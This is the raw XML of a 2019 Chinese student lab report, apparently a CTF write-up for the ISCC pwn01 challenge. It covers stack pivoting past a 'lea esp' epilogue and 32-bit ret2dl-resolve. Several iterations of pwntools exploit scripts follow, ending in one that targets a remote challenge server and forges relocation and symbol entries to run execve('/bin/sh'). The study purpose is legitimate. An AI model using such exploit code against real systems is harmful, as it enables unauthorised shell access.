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绕过lea esp和Ret2dl的一些补充</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center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肖临风</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center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指导老师:乐德广</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center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2019年5月</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/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概述：ISCC的第一道pwn题，同样是32位下的ret2dl的考察，正好给前几天的学习做一下复习巩固。也碰到了很多新的问题。因为</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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是调试笔记，所以写的比较零散。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目录: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0x00程序分析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0x01 stack povit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0x02对Rel2dl的一些补充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0x03 纠错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0x00程序分析+一个历史遗留问题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放入IDA，发现一个超级明显的栈溢出，而且还能输入超长的字符串。#这不是明显给我们构造ret2dl提供方便嘛，否则必须要写一段调用一下read，很麻烦。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4154170" cy="1632585"/>
            <wp:effectExtent l="0" t="0" r="6350" b="133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rcRect l="19520" t="15491" r="46636" b="59960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163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但是观察一下反汇编，发现ret的上一条命令是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>lea    esp,[ecx-0x4]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，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而不是leave。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 xml:space="preserve">  0x080484b1 &lt;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main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>+91&gt;:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pop    ecx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 xml:space="preserve">  0x080484b2 &lt;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main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>+92&gt;:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pop    ebx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 xml:space="preserve">  0x080484b3 &lt;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main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>+93&gt;:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pop    ebp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:bCs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 xml:space="preserve">  0x80484b4 &lt;main+94&gt;:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>lea    esp,[ecx-0x4]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=&gt; 0x80484b7 &lt;main+97&gt;:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">ret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根据之前的经验，这个程序应该是在64位下编译的32位程序，大佬说这是i386的平栈方式。main函数的ret，一旦覆盖大量的数据，就会导致栈顶地址出错。所以之前我一直认为是无法溢出成功的。因为一旦溢出大量数据，也会修改ECX的值，导致ESP的值出问题。如下图所示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#PS:lea esp,[ecx-0x4] 实际上就是将ecx-0x4的值赋给ESP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2453005" cy="1983105"/>
            <wp:effectExtent l="0" t="0" r="635" b="133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40222" t="24616" r="41138" b="47563"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2453005" cy="1983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ESP=ECX(0x41414141-0x4)=0x4141413d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其实既然ECX对ret时的ESP能产生直接影响，那么通过控制ECX也能间接控制ESP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只需要找到pop ecx 时候对应的栈顶，就能控制ECX。下面给出脚本。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0x01 stack povit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#伪造ecx，控制esp的流程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from pwn import *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p=process('./pwn01')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gdb.attach(p,'b *0x80484b1')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payload="A"*0xe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payload+=p32(0xffffd060)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#控制ecx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p.interactive()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上面代码成功控制了ecx，使得栈顶没有乱跑。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但是因为栈空间的随机化，导致对esp的控制没有了意义。#因为每次ret时候，栈顶的位置都不确定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所以必须要到一个地址可控的区域，第一个想到的就是bss段。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通过find，发现buf的参数也是存放在bss段中。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3923030" cy="1290320"/>
            <wp:effectExtent l="0" t="0" r="8890" b="508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rcRect l="43501" t="47073" r="16831" b="28845"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3923030" cy="129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直接伪造ecx，让栈指向到bss段中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from pwn import *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p=process('./pwn01')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gdb.attach(p,'b *0x80484b1')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Address=0x12345678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fake_ecx=0x804a05a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payload="A"*0xe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payload+=p32(fake_ecx)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payload+="BBBB"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payload+=p32(Address)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p.interactive()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成功控制esp指向bss段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4344670" cy="671830"/>
            <wp:effectExtent l="0" t="0" r="13970" b="139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rcRect l="40277" t="33252" r="41922" b="61668"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4344670" cy="671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改变了ESP，现在通过gadget让EBP也进入bss段。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from pwn import *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p=process('./pwn01')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gdb.attach(p,'b *0x80484b1')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Address=0x12345678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fake_ecx=0x804a05a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fake_esp=fake_ecx-0x4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base_stage=fake_esp+0x800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gadget1=0x0804851b #pop ebp |ret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#New stack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payload="A"*0xe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payload+=p32(fake_ecx)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payload+="BBBB"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payload+=p32(gadget1)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payload+=p32(base_stage)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#fake_struct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t>p.interactive()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2964180" cy="492760"/>
            <wp:effectExtent l="0" t="0" r="762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rcRect l="21123" t="45853" r="56694" b="50365"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2964180" cy="49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0x02对Rel2dl的一些补充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FAKE_REL部分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解决问题:实际调试时候，如何判断自己伪造的结构被程序读取。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从plt表中跳入dl_reslove函数时候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dl_resolve会根据你的reloc_argc找到你的JMPREL结构(我们伪造的)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#伪造的r_info 可以先写0x107 ,看看能不能解析真正的read函数。如果不行说明伪造的结构有问题。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3835400" cy="1308100"/>
            <wp:effectExtent l="0" t="0" r="508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0"/>
                    <a:srcRect l="46347" t="46739" r="20991" b="32695"/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130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源代码如下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0xf7fee000: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push   eax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0xf7fee001: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push   ecx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0xf7fee002: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push   edx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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   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0xf7fee003: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mov    edx,DWORD PTR [esp+0x10]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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 xml:space="preserve">   0xf7fee007:</w:t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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mov    eax,DWORD PTR [esp+0xc]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=&gt; 0xf7fee00b:</w:t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ab/>
      </w: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call   0xf7fe77e0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函数通过加粗代码，将linkmap和reloc_arg分别存入edx和eax，然后call dl_fixup。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所以只需要判断call的时候edx和eax的值是不是我们传入的值就能判断，结构伪造是否成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3083560" cy="1623060"/>
            <wp:effectExtent l="0" t="0" r="10160" b="762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1"/>
                    <a:srcRect l="28768" t="33318" r="38245" b="34632"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3083560" cy="162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实际调试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Py脚本(不完整)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 -*- coding: utf-8 -*-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from pwn import *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p=process('./pwn01')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gdb.attach(p,'b *0x80484b1')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Address=0x12345678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fake_ecx=0x804a05a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buf=0x804a040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fake_esp=fake_ecx-0x4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base_stage=fake_esp+0x800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read_plt=0xf7ed2b00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gadget1=0x0804851b #pop ebp |ret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gadget2=0x08048519 #  pop esi ; pop edi ; pop ebp ; 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#New stack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payload="A"*0xe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payload+=p32(fake_ecx)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payload+="BBBB"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payload+=p32(gadget1)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payload+=p32(base_stage)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#fake_struct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plt0=0x80482f0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rel_plt=0x080482b4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reloc_arg=buf+0x200-rel_plt #fake_rel放后面一些，防止被出栈入栈覆盖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dynsym=0x080481cc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dynstr=0x0804822c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r_offset=0x0804a00c #read_got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r_info=0x107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fake_rel=p32(r_offset)+p32(r_info)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payload+=p32(plt0)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payload+=p32(reloc_arg)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payload+="A"*(0x200-len(payload)) #fake_rel的位置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payload+=fake_rel #buf+0x200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p.interactive()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传送reloc没问题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EAX=0xf7ffd918 #link_map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EDX=0x1db2 #reloc_argc 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2882265" cy="2875915"/>
            <wp:effectExtent l="0" t="0" r="13335" b="444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2"/>
                    <a:srcRect l="13882" t="25827" r="53376" b="13888"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2882265" cy="287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然后就进入call 0xf7fe77e0了，应该会读取我们伪造的REL结构了。但是执行到push esi的时候。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一开始以为是我们结构构造错误，但是自己观察报错。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发现提示SIGSEGV，即段错误。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再仔细一看，现在的栈已经下降到了0x804a002了，已经从bss段下降到了其他不可写的段，直接导致了段错误。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主要原因是因为我图方便，把bss的首地址作为了栈顶。解决方案就是在程序开始的时候就大幅度提高栈的地址。#这个图方便导致我卡了一个半个小时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3076575" cy="2795270"/>
            <wp:effectExtent l="0" t="0" r="190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3"/>
                    <a:srcRect l="9730" t="21945" r="67458" b="39795"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3076575" cy="2795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2853055" cy="772160"/>
            <wp:effectExtent l="0" t="0" r="12065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4"/>
                    <a:srcRect l="28539" t="54351" r="44816" b="32339"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2853055" cy="77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于是提高栈空间重新写一下exp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 -*- coding: utf-8 -*-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from pwn import *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p=process('./pwn01')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gdb.attach(p,'b *0x80484b1')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Address=0x12345678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fake_ecx=0x804a05a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buf=0x804a040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fake_esp=fake_ecx-0x4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base_stage=fake_esp+0x800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read_plt=0xf7ed2b00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stack_size=0x500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gadget1=0x0804851b #pop ebp |ret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gadget2=0x08048519 #  pop esi ; pop edi ; pop ebp ; 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gadget3=0x080483c5 #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#New stack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payload="A"*0xe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payload+=p32(fake_ecx)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payload+="BBBB"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#payload+=p32(read_plt)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#payload+=p32(gadget2)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#payload+=p32(0)+p32(base_stage)+p32(100)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payload+=p32(gadget1)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payload+=p32(base_stage)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payload+=p32(gadget3)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payload+=p32(base_stage+stack_size)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#struct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plt0=0x80482f0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rel_plt=0x080482b4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reloc_arg=0x804a862-rel_plt #fang hou mian yidian ,hui bei fugai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dynsym=0x080481cc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dynstr=0x0804822c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r_offset=0x0804a00c #read_got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r_info=0x107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fake_rel=p32(r_offset)+p32(r_info)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payload+="A"*(0x804a85a-buf-len(payload))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payload+=p32(plt0)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payload+=p32(reloc_arg)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payload+=fake_rel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p.interactive()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可以看到call结束之后，直接进入了read函数。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因为我们赋给r_info =0x107，正好读取了read的SYM结构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3479800" cy="1112520"/>
            <wp:effectExtent l="0" t="0" r="1016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5"/>
                    <a:srcRect l="5944" t="48653" r="59658" b="31048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111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FAKE_SYM部分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经验：在写ret2dl方法的时候，一般不是一气呵成的。先尝试把数据布置在bss段中，然后调试程序，确定代码的位置，然后再修改reloc_arg、fake_rel和fake_sym结构里面的参数到正确的位置。否则，一下子是很难拿写出来的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Q1：程序退出，0177这种报错，说明是查找dysn，却没有找到对应的内容。需要重新检查构造的SYM结构。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4260850" cy="1029970"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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6"/>
                    <a:srcRect l="17519" t="59671" r="55944" b="28489"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4260850" cy="1029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Q2：SIGSEGV报错，还是一样的栈过低问题。也可能是r_info读取位置错了，读到其他段里面去了。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3173730" cy="2654300"/>
            <wp:effectExtent l="0" t="0" r="11430" b="1270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7"/>
                    <a:srcRect l="14517" t="29023" r="60731" b="32762"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3173730" cy="265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Q3：symbol lookup error ，读取sym结构错误，（ECX中显示）应该是读取的位置不正确。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3902075" cy="2411730"/>
            <wp:effectExtent l="0" t="0" r="14605" b="1143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8"/>
                    <a:srcRect l="15855" t="36323" r="50374" b="25150"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3902075" cy="2411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写出一个满是补丁的EXP，并且包含大量硬编码。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 -*- coding: utf-8 -*-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from pwn import *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p=process('./pwn01')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gdb.attach(p,'b *0x80484b1')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Address=0x12345678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fake_ecx=0x804a05a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buf=0x804a040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fake_esp=fake_ecx-0x4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base_stage=fake_esp+0x800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read_plt=0xf7ed2b00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stack_size=0x500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gadget1=0x0804851b #pop ebp |ret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gadget2=0x08048519 #  pop esi ; pop edi ; pop ebp ; ret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gadget3=0x080483c5 # leave ；ret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#New stack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payload="A"*0xe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payload+=p32(fake_ecx)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payload+="BBBB"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#payload+=p32(read_plt)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#payload+=p32(gadget2)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#payload+=p32(0)+p32(base_stage)+p32(100)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payload+=p32(gadget1)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payload+=p32(base_stage)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payload+=p32(gadget3)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payload+=p32(base_stage+stack_size)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#struct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dynsym=0x080481cc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dynstr=0x0804822c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plt0=0x80482f0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rel_plt=0x080482b4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reloc_arg=0x804a862-rel_plt #fang hou mian yidian ,hui bei fugai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r_offset=0x0804a00c #read_got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fake_sym_addr=0x804a86a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align=0x10-((fake_sym_addr-dynsym)&amp;0xf) #align=8#栈对齐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fake_sym_addr=fake_sym_addr+align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r_info=((fake_sym_addr-dynsym)/0x10)&lt;&lt;8|0x7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#r_info=0x107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fake_rel=p32(r_offset)+p32(r_info)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payload+="A"*(0x804a85a-buf-len(payload))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payload+=p32(plt0)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payload+=p32(reloc_arg)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payload+=fake_rel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st_name=0x804a87c-dynstr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fake_sym=p32(st_name)+p32(0)+p32(0)+p32(0x12)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payload+="B"*align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payload+=fake_sym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payload+="system\x00"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p.interactive()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成功重定位read为system函数</w:t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4284345" cy="2144395"/>
            <wp:effectExtent l="0" t="0" r="13335" b="444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9"/>
                    <a:srcRect l="28201" t="29134" r="36243" b="38015"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4284345" cy="2144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但是参数布置就很麻烦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解决方案就是再payload+=p32(reloc_arg)后面添加4个字节任意数和/bin/sh的地址。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这样弹出shell之后，程序的参数正好指向/bin/sh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代码如下：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 -*- coding: utf-8 -*-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from pwn import *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p=process('./pwn01')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#p=remote('39.100.87.24',8101)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gdb.attach(p,'b *0x80484b1')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Address=0x12345678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fake_ecx=0x804a05a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buf=0x804a040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fake_esp=fake_ecx-0x4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base_stage=fake_esp+0x800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read_plt=0xf7ed2b00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stack_size=0x500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gadget1=0x0804851b #pop ebp |ret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gadget2=0x08048519 #  pop esi ; pop edi ; pop ebp ; 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gadget3=0x080483c5 #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#New stack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payload="A"*0xe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payload+=p32(fake_ecx)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payload+="BBBB"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#payload+=p32(read_plt)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#payload+=p32(gadget2)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#payload+=p32(0)+p32(base_stage)+p32(100)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payload+=p32(gadget1)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payload+=p32(base_stage)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payload+=p32(gadget3)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payload+=p32(base_stage+stack_size)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#struct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dynsym=0x080481cc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dynstr=0x0804822c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plt0=0x80482f0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rel_plt=0x080482b4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reloc_arg=0x804a872-rel_plt #fang hou mian yidian ,hui bei fugai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r_offset=0x0804a00c #read_got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fake_sym_addr=0x804a87a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align=0x10-((fake_sym_addr-dynsym)&amp;0xf) #align=8#栈对齐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fake_sym_addr=fake_sym_addr+align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r_info=((fake_sym_addr-dynsym)/0x10)&lt;&lt;8|0x7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#r_info=0x107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fake_rel=p32(r_offset)+p32(r_info)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bin_sh=0x804a8e3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payload+="A"*(0x804a85a-buf-len(payload))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payload+=p32(plt0)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payload+=p32(reloc_arg)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payload+=p32(bin_sh)#set argc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payload+="A"*8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payload+=fake_rel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st_name=0x804a88c-dynstr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fake_sym=p32(st_name)+p32(0)+p32(0)+p32(0x12)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payload+="B"*align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payload+=fake_sym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payload+="system\x00"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payload+="A"*80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payload+="/bin/sh\x00"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p.interactive()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3314065" cy="1720850"/>
            <wp:effectExtent l="0" t="0" r="8255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rcRect l="15746" t="46116" r="49373" b="20454"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3314065" cy="172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4034790" cy="2387600"/>
            <wp:effectExtent l="0" t="0" r="381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rcRect l="15517" t="38571" r="46033" b="19430"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4034790" cy="238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但是依旧没弹出shell，参数和system都没有错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后来发现换成execve就解决了（execve要设置三个参数/bin/sh ，0 ，0）</w:t>
      </w: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最终脚本：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 -*- coding: utf-8 -*-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from pwn import *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#p=process('./pwn01')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p=remote("39.100.87.24",8101)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#gdb.attach(p,'b *0x80484b1')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Address=0x12345678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fake_ecx=0x804a05a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buf=0x804a040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fake_esp=fake_ecx-0x4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base_stage=fake_esp+0x800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read_plt=0xf7ed2b00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stack_size=0x500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gadget1=0x0804851b #pop ebp |ret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gadget2=0x08048519 #  pop esi ; pop edi ; pop ebp ; ret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gadget3=0x080483c5 #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#New stack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payload="A"*0xe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payload+=p32(fake_ecx)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payload+="BBBB"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#payload+=p32(read_plt)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#payload+=p32(gadget2)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#payload+=p32(0)+p32(base_stage)+p32(100)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payload+=p32(gadget1)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payload+=p32(base_stage)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payload+=p32(gadget3)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payload+=p32(base_stage+stack_size)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 xml:space="preserve">#struct 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dynsym=0x080481cc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dynstr=0x0804822c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plt0=0x80482f0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rel_plt=0x080482b4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reloc_arg=0x804a872-rel_plt #fang hou mian yidian ,hui bei fugai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r_offset=0x0804a00c #read_got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fake_sym_addr=0x804a87a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align=0x10-((fake_sym_addr-dynsym)&amp;0xf) #align=8#栈对齐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fake_sym_addr=fake_sym_addr+align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r_info=((fake_sym_addr-dynsym)/0x10)&lt;&lt;8|0x7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#r_info=0x107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fake_rel=p32(r_offset)+p32(r_info)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bin_sh=0x804a8e3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payload+="A"*(0x804a85a-buf-len(payload))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payload+=p32(plt0)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payload+=p32(reloc_arg)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payload+="A"*4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payload+=p32(bin_sh)#set argc #之前的wp里面写错了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payload+=p32(0)+p32(0)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payload+=fake_rel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st_name=0x804a88c-dynstr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fake_sym=p32(st_name)+p32(0)+p32(0)+p32(0x12)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payload+="B"*align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payload+=fake_sym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payload+="execve\x00"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payload+="A"*80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payload+="/bin/sh\x00"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payload+="A"*20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p.sendline(payload)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p.interactive()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4126230" cy="875665"/>
            <wp:effectExtent l="0" t="0" r="3810" b="825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rcRect l="25217" t="49200" r="39137" b="36835"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4126230" cy="87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default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但是远程服务器还是不行，据说是服务器控制只能一次输入200字节，导致我们这个超长的payload没有用武之地。如果要服务器上实现，需要将payload分开，每次再payload结尾调用read再次读取数据到栈中。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</w:rPr>
      </w:pP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0x03 纠错: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之前写的时候没多想，第四行的注释写错了。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  <w:t>Base_stage+80实际上是/bin/sh的位置，做传参之用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4418965" cy="2720340"/>
            <wp:effectExtent l="0" t="0" r="635" b="7620"/>
            <wp:docPr id="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1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:srcRect l="9284" t="41331" r="43140" b="4607"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4418965" cy="2720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3" w:type="default"/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rPr>
        <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
        <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
      </w:rPr>
      <w:t>常熟理工</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
      </w:rPr>
      <w:t>下一代互联网技术实验室</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
      </w:rPr>
      <w:t>学习报告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E25424"/>
    <w:rsid w:val="04780CBA"/>
    <w:rsid w:val="04B80C97"/>
    <w:rsid w:val="0BD76FE2"/>
    <w:rsid w:val="0D282662"/>
    <w:rsid w:val="126C0E66"/>
    <w:rsid w:val="16670268"/>
    <w:rsid w:val="17661B6D"/>
    <w:rsid w:val="17B00F01"/>
    <w:rsid w:val="221F74B9"/>
    <w:rsid w:val="23691000"/>
    <w:rsid w:val="24EA4159"/>
    <w:rsid w:val="25FA3B28"/>
    <w:rsid w:val="28734BE3"/>
    <w:rsid w:val="29FC11CF"/>
    <w:rsid w:val="31E60682"/>
    <w:rsid w:val="365C2A16"/>
    <w:rsid w:val="37D30D5A"/>
    <w:rsid w:val="3A2868A0"/>
    <w:rsid w:val="3C342E51"/>
    <w:rsid w:val="3D5B0898"/>
    <w:rsid w:val="3E8E284D"/>
    <w:rsid w:val="3F89360C"/>
    <w:rsid w:val="410A1D62"/>
    <w:rsid w:val="42DB1074"/>
    <w:rsid w:val="445C3436"/>
    <w:rsid w:val="448D0888"/>
    <w:rsid w:val="456F6694"/>
    <w:rsid w:val="463C238F"/>
    <w:rsid w:val="464C164B"/>
    <w:rsid w:val="46CD0EDC"/>
    <w:rsid w:val="4A185DCD"/>
    <w:rsid w:val="4DDF2711"/>
    <w:rsid w:val="51CE60EF"/>
    <w:rsid w:val="54932A79"/>
    <w:rsid w:val="54A16440"/>
    <w:rsid w:val="551E4DE5"/>
    <w:rsid w:val="55477B6D"/>
    <w:rsid w:val="559A6B7B"/>
    <w:rsid w:val="56192B78"/>
    <w:rsid w:val="59994842"/>
    <w:rsid w:val="5B0657DD"/>
    <w:rsid w:val="5B395F5F"/>
    <w:rsid w:val="60865C50"/>
    <w:rsid w:val="622A2B62"/>
    <w:rsid w:val="648323FE"/>
    <w:rsid w:val="68876351"/>
    <w:rsid w:val="6A3A06A4"/>
    <w:rsid w:val="6C926645"/>
    <w:rsid w:val="6EEF7666"/>
    <w:rsid w:val="73712F21"/>
    <w:rsid w:val="74DD7B6C"/>
    <w:rsid w:val="7AAB1282"/>
    <w:rsid w:val="7D5500B5"/>
    <w:rsid w:val="7D957221"/>
    <w:rsid w:val="7E6B72B8"/>
    <w:rsid w:val="7EA97B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5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</w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="none" w:color="auto" w:sz="0" w:space="1"/>
        <w:left w:val="none" w:color="auto" w:sz="0" w:space="4"/>
        <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="1"/>
        <w:right w:val="none" w:color="auto" w:sz="0" w:space="4"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:sz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" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header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12</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>0</CharactersWithSpaces>
  <Application>WPS Office_11.1.0.8661_F1E327BC-269C-435d-A152-05C5408002CA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肖临风</dc:creator>
  <cp:lastModifiedBy>肖临风</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-03T13:32:55Z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2052-11.1.0.8661</vt:lpwstr>
  </property>
</Properties>
</file>